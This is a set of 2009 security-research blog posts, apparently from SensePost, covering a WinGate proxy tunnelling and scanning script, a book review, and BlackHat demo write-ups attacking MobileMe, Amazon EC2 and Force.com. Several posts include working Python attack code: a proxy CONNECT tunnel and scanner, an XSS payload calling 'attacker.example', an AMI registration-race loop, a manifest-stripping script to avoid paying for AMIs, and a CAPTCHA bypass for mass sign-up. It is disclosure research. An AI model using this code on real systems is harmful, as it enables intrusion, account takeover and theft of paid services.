
Wed, 26 Aug 2009

MonSoen.py

I was recently playing with a WinGate proxy server and came across some arbitrary interestingness.

So, WinGate proxy includes a remote management agent which is accessed via a client utility called GateKeeper. This allows one to configure the WinGate server across the network. However, it's not enabled to listen on the network by default, and only listens on 127.0.0.1:808. From my perusal of the documentation, the remote administrative facility should only be available to enterprise and professional license holders, and those firms using standard edition licenses will have to configure their proxy software locally.

In any case, WinGate proxy supports the CONNECT method to negotiate connections for SSL-based websites and the like, but no access control is in place to prevent users from using this method to connect to 127.0.0.1:808. This, along with some python-fu, makes it a trivial task to access the remote administration service across the network. This is illustrated in the following images.

[caption id="attachment_3882" align="alignnone" width="300" caption="Tunnelling with MonSoen - Connected to GateKeeper"]

Tunnelling with Monsoen - Connected to GateKeeper
[/caption]
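For the curious, the CONNECT trick itself boils down to something like the following sketch (this isn't MonSoen, just the bare idea): a tiny local listener that relays whatever connects to it through the proxy to 127.0.0.1:808 on the far side. The proxy address and local port below are placeholders.

    # Sketch only: relay a local connection through the proxy's CONNECT
    # handling to the GateKeeper port on the proxy's own loopback.
    import select
    import socket

    PROXY_HOST, PROXY_PORT = "192.0.2.10", 8080   # the WinGate proxy (placeholder)
    TARGET = "127.0.0.1:808"                      # GateKeeper on the proxy's loopback
    LOCAL_PORT = 1808                             # point the GateKeeper client here

    def open_tunnel():
        """Connect to the proxy and negotiate a CONNECT tunnel to TARGET."""
        s = socket.create_connection((PROXY_HOST, PROXY_PORT))
        s.sendall(("CONNECT %s HTTP/1.0\r\n\r\n" % TARGET).encode())
        status_line = s.recv(4096).split(b"\r\n")[0]
        if b" 200" not in status_line:
            raise RuntimeError("proxy refused CONNECT: %r" % status_line)
        return s

    def relay(a, b):
        """Shuttle bytes between two sockets until either side closes."""
        while True:
            readable, _, _ = select.select([a, b], [], [])
            for src in readable:
                data = src.recv(4096)
                if not data:
                    return
                (b if src is a else a).sendall(data)

    # Accept a single local connection and tunnel it through the proxy.
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", LOCAL_PORT))
    listener.listen(1)
    client, _ = listener.accept()
    relay(client, open_tunnel())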

Naturally, after knocking together a little proxy tunnel script, I remembered an idea Gareth had a number of years ago for scanning networks and port ranges via badly configured proxies, and decided to incorporate it into the original tunnel script. An example is illustrated in the following image...

[caption id="attachment_3878" align="alignnone" width="300" caption="Scanning with MonSoen"]

Scanning with MonSoen
[/caption]

So, enter MonSoen.py. A cute (and probably entirely unnecessary) Python-based script for tunnelling connections through proxy servers, scanning networks using GET or CONNECT and otherwise being miserable to others (nods at Gareth).
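The scanning side is conceptually just as simple; a minimal sketch of the idea (again, not MonSoen's actual code) uses netaddr to walk a range and issue a CONNECT per host and port through the proxy. The proxy address, network range and port list below are all placeholders.

    # Sketch only: use an open proxy's CONNECT handling as a crude port scanner.
    import socket
    from netaddr import IPNetwork

    PROXY = ("192.0.2.10", 8080)         # misconfigured proxy (placeholder)
    PORTS = (22, 80, 443, 808, 3389)     # ports to probe through the proxy

    def probe(host, port):
        """Return True if the proxy reports a successful CONNECT to host:port."""
        try:
            s = socket.create_connection(PROXY, timeout=5)
        except OSError:
            return False
        try:
            s.sendall(("CONNECT %s:%d HTTP/1.0\r\n\r\n" % (host, port)).encode())
            status_line = s.recv(1024).split(b"\r\n")[0]
            return b" 200" in status_line
        except OSError:
            return False
        finally:
            s.close()

    for ip in IPNetwork("10.0.0.0/28"):  # placeholder target range
        for port in PORTS:
            if probe(str(ip), port):
                print("%s:%d reachable via proxy" % (ip, port))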

It's going to need the Python netaddr module. MonSoen is available from http://www.sensepost.com/research_misc.html

Ian.

Sun, 23 Aug 2009

John Viega's "the myths of security".. Really??

i go through a ton of books. Over the past 10 years, this has been dominated by books on computer security, computer science, programming (and a sprinkling of management classics).

I generally stay away from writing reviews, but was genuinely surprised at the number of 5-star reviews Viega's new book had received and felt i had to chime in.

I picked up "the myths of security" (what the computer industry doesn't want you to know) with hope, because O'Reilly books in general are well done and i really liked some of Johns previous books. Alas! I tried hard to think of a good thing to say about the book, and the best i can come up with right now is that "at least, it wont take up space on my bookshelf".

The book is tiny (48 chapters, where each chapter runs from a paragraph to 2-3 pages), which isn't a bad thing, but it reads mostly as a collection of blog posts or hurriedly written notes-to-self.

Advertising++ The Foreword alone uses the word McAfee 14 times, and over the 48 chapters, the word McAfee goes on to appear about 65 times. This is acceptable on a blog; in a book i just paid for, it's slightly annoying.

Target Audience I agree with Bejtlich, who can't figure out the book's target audience. One chapter might give explanations in crayon (presumably for the less sophisticated user) while the next might give advice on how to label the security technology you plan to sell.

Consistency There are a number of times in the book where the author takes opposite sides of an argument (in different chapters). This is useful if coherently positioned as two sides of an argument, but when it happens across different arguments on different pages, it seems more like the author is merely choosing the position that's convenient to support his view at the time...

It's slightly odd when compared with his take on security spend to hear the author say this about the TSA and their "Security Theater": "But there's some hidden value here—it makes people feel safer. Whether it works well or poorly, it is better than nothing and it makes people feel better."

General whining (by me). The author dedicates a chapter to Mobile Phones titled "OK, Your Mobile Phone Is Insecure; Should You Care?". He concludes with: "Sure, there will always be the occasional virus for smartphones, but I don't see an epidemic emerging. At the end of the day, there is still lower-hanging fruit for the bad guys. It is still far easier for them to make money attacking traditional PCs and laptops then going after mobile phones. That may eventually change, but I'm not going to hold my breath."

I think the view that you only need to be worried about the ability of your device to withstand an attack "epidemic" is wrong on so many levels. I'm far less worried about my iPhone becoming part of a botnet than i am about the fact that these days huge parts of my life are on it, and can be grabbed by Charlie Miller if he is willing to pay the $0.20 to send me a few SMSes.

In his Epilogue, he writes: "But instead of preaching that the customer is hosed, I'm preaching that the security industry is hosed—I don't think customers are hosed at all." which is an interesting contrast to his chapter on PKI that ends with "That leaves the Internet fundamentally broken."..

Of course the lines that most bothered me were in the chapters on Privacy and Anonymity. Privacy gets just under 200 words but includes the classic line: "privacy is nice in theory, but if you don't have anything to hide, what's the big deal?"

Hmm.. OK.. let's see the take on anonymity before responding.

Anonymity gets 166 words (wow, about 100 more than the number of McAfee mentions!) and once more ends with the classic: "Oh, and I've got nothing to hide anyway…."

The author cites the example of Zero-Knowledge, who built a paid service to surf anonymously which "worked pretty well, but nobody cared".

Once more, i think there is so much wrong here that i'm not sure where to start. Having to convince someone that privacy is important even if you can't sell it seems like a pretty old argument to be having..

In general, i think it's safe to say that the book left me disappointed, and a little bit afraid that somewhere decision makers could be forming an opinion on an entire industry based on ~250 words dedicated to a topic that deserves much more thought..

/mh

Sun, 9 Aug 2009

BlackHat presentation demo vids: MobileMe

[part 5 in a series of 5 video write-ups from our BlackHat 09 talk, summary here]

Goal

The final installment of our BlackHat video series showcases weaknesses in the password reset feature for Apple's MobileMe service as well as publicizing an XSS vulnerability in the application. At first glance the choice of MobileMe may seem arbitrary, but it was useful for a number of reasons. MobileMe is one of the more popular consumer-focused cloud services and it's a good example of the feature-creep that's a hallmark of cloud systems. By compromising a user's MobileMe account an attacker has access to much more than just the user's mail. With each new feature addition the user is sucked into the service a little more until most of their data is stored within MobileMe, and a compromise of the account becomes serious for the user.

To this end, we arrived at the point where, if we were a little more malicious, we could read Steve Wozniak's mail, peruse his calendar, follow his physical location on Google Maps and embed JavaScript in his MobileMe account for continued access.

Background

Apple's MobileMe product (formerly .Mac) provides users with a number of subscription-based services for interacting and existing online, including push mail, contacts, calendaring, storage, photos and iPhone integration. These are delivered via a web interface and the infrastructure is managed by Apple.

Video 1: Password Reset

Performing authentication on a massive userbase with whom there is zero offline interaction is hard, especially when it comes down to the degraded authentication required by password reset processes. Considering that web interfaces appear to be the dominant channel by which cloud services are managed (we touch on the implications here), a flawed password reset process can mean that attackers gain access to more than simply your mail.

In August last year, TechCrunch published a way to enumerate usernames on MobileMe. We abused this further to target a specific user on MobileMe in order to reset his password. As the video shows, the process only requires a birthdate (which is generally obtainable through Facebook, Wikipedia, Amazon wishlists or the like) and a secret question. Again, with enough digging the answer to the secret question is often guessable. In the video above we show a toy example of the password reset working against a SensePoster.

Video 2: XSS in iPhone name

This video demonstrates an XSS vulnerability that we found in the iPhone/MobileMe integration. JavaScript inserted into the iPhone's name was displayed on the "Find My iPhone" page on MobileMe. Some slight trickery was required, as the JavaScript was truncated at two points in the page but passed through untouched in three others; by extending the name and embedding the JavaScript past the truncation point we solved this issue.
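As a purely hypothetical illustration of the padding trick (neither the truncation length nor the script URL below come from the MobileMe page), the name simply gets front-loaded so that the truncated spots only ever see padding while the untouched spots receive the full payload:

    # Hypothetical values only: pad the device name so the script tag falls
    # beyond the assumed truncation point.
    TRUNCATION_LENGTH = 24
    payload = '<script src="//attacker.example/m.js"></script>'
    device_name = "A" * TRUNCATION_LENGTH + payload
    print(device_name)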

Apple has since patched this bug.

Video 3: Woz's mail

Finally, we demonstrate the password reset attack against Woz's MobileMe account. We stopped before actually resetting his password, but in his own words he stores mail, calendaring info and other information that is sensitive to him on MobileMe, and the ability to XSS the page would mean that the continued compromise of the account was possible.

Conclusion

The reliance on web interfaces to control cloud services has unintended consequences. With the feature-creep that takes place, more and more of our data is placed in the cloud yet the security controls remain at the level used to protect Hotmail or Amazon bookstore accounts. By piecing together publicly available information, we can generate a profile that is sufficiently complete for a password reset, which points to flaws within the reset process.

Sat, 8 Aug 2009

BlackHat presentation demo vids: Amazon

[part 4 in a series of 5 video write-ups from our BlackHat 09 talk, summary here]

Goal

In the fourth installment of our BlackHat video series, we turned our attention to Amazon's cloud platform and focused on their Elastic Compute Cloud (EC2) service specifically.

Theft of resources is the red-headed step-child of attack classes and doesn't get much attention, but on cloud platforms where resources are shared amongst many users these attacks can have a very real impact. With this in mind, we wanted to show how EC2 was vulnerable to a number of resource theft attacks and the videos below demonstrate three separate attacks against EC2 that permit an attacker to boot up massive numbers of machines, steal computing time/bandwidth from other users and steal paid-for AMIs.

Background

EC2 enables users to boot and run virtual machines that are custom-configured by the user but execute within Amazon's cloud. Each virtual machine or Amazon Machine Instance (AMI) has its own IP, non-persistent storage, CPU and network connection. The service is full-featured and we won't go into all the details here; more info is available from the EC2 site. With that said, we'll point out three key facts that shaped our testing:
  1. The service is controlled via a web interface so sign-up obviously occurs in a browser. Sign-up requires minimal information, essentially just an email address and credit card info.
  2. When booting an AMI, users can either create their own image from scratch or they can choose from a list of pre-built AMIs which are overwhelmingly supplied by other EC2 users.
  3. Amazon provides a facility called DevPay by which users can create AMIs for leasing to other users; when a non-free AMI is run, the user running the instance is charged a fixed rate and the proceeds are split between the creator of the AMI and Amazon.

Video 1: AMIBomb

For this video we wanted to consider a DoS on EC2 from within, by running as many AMIs concurrently as possible.

Since sign-up for the service occurred in a browser, it was possible to script this process (using Twill for the most part). The first attack would be to boot hundreds or thousands of instances under one Amazon account; however, Amazon enforces an upper bound of 20 running machines per account. Our approach was one step removed from this: we created multiple accounts and then ran the 20 machines. Each new account would also create multiple accounts and then run 20 machines. One iteration of the create-accounts-and-boot-AMIs cycle took three minutes; by the ninth iteration the projected number of running instances is ridiculous. It's apparent that this recursive registering of accounts and booting of machines means that the number of running machines grows exponentially, and this could continue until the system can't handle the machine load.
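To put a rough number on "ridiculous", here's a back-of-the-envelope sketch; the 20-instance cap and the three-minute cycle come from the process above, while the fan-out of five new accounts per account per cycle is purely an assumption:

    # Back-of-the-envelope projection of the recursive sign-up-and-boot cycle.
    INSTANCE_CAP = 20     # running instances allowed per account
    NEW_ACCOUNTS = 5      # accounts each account registers per cycle (assumption)
    CYCLE_MINUTES = 3

    fresh_accounts, instances = 1, 0
    for iteration in range(1, 10):
        instances += fresh_accounts * INSTANCE_CAP   # each new account boots its 20
        fresh_accounts *= NEW_ACCOUNTS               # ...and registers the next wave
        print("iteration %d (~%d min): ~%d running instances"
              % (iteration, iteration * CYCLE_MINUTES, instances))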

Our approach was effective because the registration process took no steps to prevent automated sign-up. In testing, a single credit card was used to create our accounts, which is an immediate anomaly; a malicious attacker would use stolen CC data to ensure that CC checks did not prevent new account registration.

Video 2: AMI Registration Race

As has been mentioned, users can choose AMIs from a list of machines that is mostly user-generated (out of 2700-odd machines, 47 were built by Amazon and the remainder by other users). It is easy to add a machine to this list; simply create a new AMI and in its properties mark it as 'public'.

Our idea was to create a malicious AMI and add it to the public listing, with the goal of showing that users will run AMIs without any consideration for who built them or whether nasties were included. We quickly created an AMI, uploaded it and... nothing. No one ran the image and it seemed that people weren't so easily fooled.

Digging a little deeper, however, revealed that when our image was created, it was dumped on the second last page of the AMI listings and so users would have to surf through more than 50 pages of images before coming across our AMI. If Google has taught us anything, it's that ranking counts and so we needed to boost our machine up the AMI listing.

It turns out that the AMI listing is ordered by the AMI ID, which is a random ID string generated when the AMI is created. Our process was then slightly modified as follows: we scripted the AMI registration process so that it was trivial to register an image. We then looped the registration script to create and register an AMI, and tested whether the randomly assigned AMI ID was low enough for our AMI to be listed on the first page.
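The shape of that loop is roughly as follows; this sketch uses the boto3 EC2 client rather than the tooling from the demo, and the manifest location and the "front page" prefix test are assumptions:

    # Sketch of the registration race: keep re-registering the bundle until the
    # randomly assigned AMI ID sorts onto the first page of the listing.
    import boto3

    ec2 = boto3.client("ec2", region_name="us-east-1")
    MANIFEST = "my-bucket/image.manifest.xml"   # S3 bundle manifest (placeholder)

    attempt = 0
    while True:
        attempt += 1
        image_id = ec2.register_image(Name="fedora_core_11-%d" % attempt,
                                      ImageLocation=MANIFEST)["ImageId"]
        # Treating an "ami-0..." ID as low enough for the first page is an assumption.
        if image_id.startswith("ami-0"):
            print("front-page ID after %d attempts: %s" % (attempt, image_id))
            break
        ec2.deregister_image(ImageId=image_id)  # discard and roll again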

Our first attempt took about 4000 iterations and landed us a top 5 spot in under 12 hours. A subsequent attempt took less than 4 hours to land a top 5 spot.

This was great, but our image was unattractively named 'qscanImage' running on the 'Other Linux' platform, which didn't say much about it.

It turned out that we had a great degree of freedom in naming images. Images were stored in Amazon S3 buckets and the buckets had globally unique names. We tried buckets with names such as 'fedora', 'fedora_core' and 'redhat', but these were all taken; however, with a small degree of evilness, the bucket 'fedora_core_11' was available and so was registered. The registration race was repeated with the better-named machine, and after a little while we landed the AMI on the front page as shown in the screenshot below:

What's funny is that the machine was the highest listed 'Fedora' AMI, so a user who was specifically looking for a Fedora image would come across our evil image first.

In reality our image did not have anything malicious except a call-home line in '/etc/rc.local' that would 'wget' a file on our webserver, to show the image had been booted. The screenshot below shows the log line from our webserver which proved this; it occurred a little under four hours after the image had been made public.

Video 3: AMI Stealing

Our final Amazon video shows how it is possible to remove ancestry information from AMIs. When a paid-for machine is created, Amazon stores information about the owner of the machine in its manifest (which is an XML document) in order to pay the creator of the image. Our attack works as follows:

  1. Purchase a paid-for image
  2. Use Amazon's tools to create a bundle from the running AMI
  3. Download the manifest for the bundle
  4. Modify the manifest by removing the associated product code and owner information
  5. Resign the manifest using Amazon's tools
  6. Upload the manifest
  7. Register a new AMI using the bundle that was copied from the paid-for AMI, along with the edited manifest
  8. Stop using the original paid-for AMI
Using this attack, it is possible to pay once for an AMI, create a copy and never pay the creator again.
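As a sketch of what step 4 might look like in practice (the element names here are assumptions, since the manifest structure isn't reproduced above; check them against a real bundle manifest):

    # Sketch: strip product-code and owner elements from a downloaded bundle
    # manifest before re-signing it with Amazon's tools (step 5).
    import xml.etree.ElementTree as ET

    tree = ET.parse("image.manifest.xml")
    root = tree.getroot()

    for parent in root.iter():
        for child in list(parent):
            # Which tags actually carry the product code and owner info is an
            # assumption; adjust after inspecting a real manifest.
            if "product_code" in child.tag or child.tag in ("user", "account_id"):
                parent.remove(child)

    tree.write("image.manifest.xml")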

Conclusion

In this set of three videos, we showed attacks against the Amazon EC2 platform that do not target specific weaknesses in technologies; rather, the processes by which complex actions took place were abused to our benefit. In doing so, we managed to sketch a scenario by which a local DoS might be effected against EC2, successfully showed how easy it was to have users run untrusted AMIs, and lastly described a method by which non-free AMIs may be stripped of owner information, thereby depriving the AMI creator of income and allowing the attacker to continue using the paid-for AMI without cost.

BlackHat presentation demo vids: SalesForce Sifto

[part 3 in a series of 5 video write-ups from our BlackHat 09 talk, summary here]

Goal

Our third video write-up covers abuse of cloud services. By signing up for free accounts, it is possible to gain access to small amounts of free resources, specifically processing time and bandwidth. However, these resources are tightly controlled to maintain fairness across the many thousands of users who share the same platform.

We aim to circumvent some of these controls in order to access more resources than should be allowed, and we demonstrate this on the Force.com platform, which allows a developer to upload and execute custom code. Our proof-of-concept was to port Nikto into a Force.com application, and we named it Sifto.

Background

SalesForce's primary offering is a web-based CRM solution which they manage, and they also provide developers with the ability to write custom applications that run on the Force.com platform. They are a major player in the cloud universe with almost 60 000 customers, revenue over $1 billion and are a member of the S&P 500 index.

In order to write applications on Force.com, a developer account is required (this is freely available). Applications are coded in Apex, a Java-like language for business logic that is proprietary to the Force.com platform. The platform supports datastore operations through built-in language constructs, and the API enables a developer to make HTTP callouts, tie Apex code to web service endpoints within Force.com, send emails, and tie Apex code to an email endpoint within Force.com. The datastore is useful for maintaining state between multiple iterations of the event loop (described shortly) as well as providing a way to send emails for free via update triggers (emails sent from within Apex count against the daily limit).

With all this in mind, we focused on creating event loops that were initiated by a single user action, to show how significant free computing resources were available if one is prepared to put in the legwork of learning new languages and platforms.

Video 1

  1. The first part of the video runs through the setup required within the Force.com account to create the Sifto application. This included the custom Apex code, the custom objects, the datastore trigger that sent an email, and the email endpoint that received the trigger and invoked our Apex; it also showed that the target was not added to the "Allowed endpoints". (The last point might require more explanation: while Apex code can make HTTP requests, the platform only permits HTTP requests to previously allowed sites. An administrator can allow a given site by navigating the Force.com administration interface and adding it, but this requires a manual process for each new Sifto target, so we needed to automate this process.)
  2. Part two of the video runs through the initialisation of a Sifto scan against a new target. The attacker shows us his wrapper script for kicking off the scan; all it does is send a specially formatted email to a specific Force.com address (a sketch of such a wrapper follows this list). Meanwhile, we tail the victim's httpd access_log to show the scan as it comes through. Incidentally, the 'tail' in the video was not sped up and shows the actual speed at which results came through. What's also noticeable is that as results are found, they're returned via email to the attacker.
  3. In part three we simply show that the target site was automatically added as an allowed endpoint within Force.com. We achieved this by auto-browsing the Force.com site from within Apex code; it's a surprisingly kludgey bit of code, but it nicely demonstrates that all configuration options are available from within Apex, and so Apex can modify the environment within which it operates.
  4. Part four depicts the scanning as it continues.
  5. Part five reveals the results of the scan as they slowly arrive via email.
  6. The scan ends in part six.
  7. Finally, part seven shows the overall results of the scan listed in a single email, and importantly shows how the entire scan of almost 3000 tests ran in about 11 minutes.
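To give a feel for how little the wrapper in part two has to do, a minimal sketch follows; the endpoint address and the message format are placeholders rather than the real values generated by the Force.com email service.

    # Sketch: kick off a Sifto scan by mailing the Force.com email endpoint.
    import smtplib
    from email.mime.text import MIMEText

    ENDPOINT = "sifto@scan-handler.example.invalid"   # placeholder for the generated
                                                      # Force.com email-service address
    TARGET = "http://victim.example/"                 # site to scan (placeholder)

    msg = MIMEText("scan %s" % TARGET)   # body format our Apex expects (assumption)
    msg["Subject"] = "sifto-start"
    msg["From"] = "attacker@example.org"
    msg["To"] = ENDPOINT

    with smtplib.SMTP("localhost") as smtp:           # hand off to a local MTA
        smtp.send_message(msg)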

Video 2

The event loop method shown in video 1 was still subject to unpublished limits, and so instead of scaling by extending the number of iterations of the event loop, we decided to try to scale by registering many accounts. This was useful since accounts had zero cost. All that remained was to automate the registration process (see the slides for more details on this), and we accomplished this as shown in video 2, where a shell script automatically registered a bunch of accounts. The trick that allowed us to bypass the CAPTCHA on the registration page was a bug in the CAPTCHA script that also provided the image's text as ASCII text (look for the "captcha captured:" lines in the video).
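The general shape of that bypass is sketched below; the signup URL and the pattern that matches the leaked CAPTCHA text are placeholders, since the post only shows the "captcha captured:" output in the video.

    # Sketch: recover the CAPTCHA text that the buggy script also emitted in the
    # page, then feed it back into the (scripted) registration form.
    import re
    import urllib.request

    SIGNUP_URL = "https://signup.example.invalid/developer"   # placeholder URL

    page = urllib.request.urlopen(SIGNUP_URL).read().decode("utf-8", "replace")
    match = re.search(r'captchaText\s*=\s*"([^"]+)"', page)   # hypothetical marker
    if match:
        print("captcha captured: %s" % match.group(1))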

Of minor interest was that each account was registered in a different country. Since SalesForce assigns accounts to instances (geographically dispersed clusters) according to the customer's claimed location, we were able to register accounts on both the NA6 and AP1 instances, North America and Asia Pacific respectively.

Conclusion

Cloud computing provides us with a tantalizing taste of vastly expanded resources, and the plethora of services means that free or trial accounts abound. It's possible to stitch together the free resources to produce a usable computing platform that takes advantage of the expanded resources without incurring cost to the attacker; the downside is that this is platform-specific and may require learning new technologies.